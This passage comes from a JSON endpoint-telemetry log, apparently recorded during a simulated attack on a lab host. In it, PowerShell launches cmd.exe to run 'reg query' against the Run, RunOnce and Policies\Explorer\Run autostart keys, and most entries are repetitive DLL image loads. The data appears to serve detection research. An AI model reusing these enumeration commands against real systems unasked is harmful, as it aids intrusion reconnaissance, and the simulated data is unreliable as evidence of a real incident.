131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "process", - "pid": 360, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001015C15001}" - }, - { - "event_type": "process", - "pid": 3952, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313860000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001021C05001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5500, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314060000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3824, - "ppid": 5500, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314150016, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314020000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "process", - "pid": 3824, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00105FC35001}" - }, - { - "event_type": "process", - "pid": 5500, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106BC25001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6396, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314320000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314180000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1060, - "ppid": 6396, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314410000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314330000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "process", - "pid": 1060, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010C6C55001}" - }, - { - "event_type": "process", - "pid": 6396, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D2C45001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2912, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314599984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314490000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6956, - "ppid": 2912, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314690000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "process", - "pid": 6956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314650000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020C85001}" - }, - { - "event_type": "process", - "pid": 2912, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102CC75001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2788, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571314870000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571314800000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5668, - "ppid": 2788, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001092C95001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "process", - "pid": 5668, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001087CA5001}" - }, - { - "event_type": "process", - "pid": 2788, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571314960000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001092C95001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3496, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571315119984, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3496, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2152, - "ppid": 3496, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571315220000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010DFCB5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 2152, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571315110000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D4CC5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2152, - "process_name": "reg.exe", - "process_path": 